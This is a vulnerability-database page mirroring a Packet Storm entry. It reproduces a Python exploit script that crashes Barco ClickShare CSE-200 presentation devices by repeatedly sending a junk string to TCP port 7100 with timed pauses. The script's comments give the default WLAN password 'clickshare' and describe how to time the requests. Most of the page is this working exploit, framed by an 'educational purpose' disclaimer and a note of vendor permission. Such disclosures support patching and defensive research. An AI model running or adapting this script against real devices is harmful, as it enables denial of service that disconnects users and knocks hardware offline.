Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Barco ClickShare CSE-200 Denial Of Service

🗓️ 16 Apr 2018 00:00:00Reported by Florian HauserType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

Barco CSE-200 ClickShare Denial of Service vulnerability via TCP port 710

Code
`#!/usr/bin/python  
  
# Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service  
# Date: 11-04-2018  
# Hardware Link: https://www.barco.com/de/product/clickshare-cse-200  
# Exploit Author: Florian Hauser  
# Contact: florian DOT g DOT hauser AT gmail DOT com  
# CVE: requested by Barco  
# Category: Hardware  
  
# Disclaimer:  
# This or previous programs is for Educational   
# purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the   
# fact that Florian Hauser is not liable for any   
# damages caused by direct or indirect use of the   
# information or functionality provided by these   
# programs. The author or any Internet provider   
# bears NO responsibility for content or misuse   
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact   
# that any damage (dataloss, system crash,   
# system compromise, etc.) caused by the use   
# of these programs is not Florian Hauser's   
# responsibility.  
#   
# Use them at your own risk!  
################  
# Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):  
# Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-  
# not only disconnects all clients but also results in a crash of this hardware device  
# Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.  
# I got permission from Barco to disclose this vulnerability.  
# This affects potentially all other ClickShare products, Barco confirms  
  
import socket  
import sys  
from time import sleep  
  
if len(sys.argv) != 2:  
print "Usage: exploit.py <ip>"  
sys.exit(0)  
  
  
# Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.  
# 6-7 requests do the job usually  
for x in range(1,50):  
#Create a new socket each time because otherwise the service drops the socket  
#Same request cannot be sent several times in sequence  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
#Connect to vulnerable TCP port 7100  
connect=s.connect((str(sys.argv[1]), 7100))  
s.send('some evil string \r\n\n')  
print "Buffer " + str(x) + " sent...\n"  
  
result=s.recv(1024)  
print result  
s.close()  
  
#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash  
sleep(7)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Apr 2018 00:00Current
7.4High risk
Vulners AI Score7.4
barco clicksharecse-200denial of servicetcp portvulnerabilityremotecrashhardwarewlanpatchvulnerability disclosure
42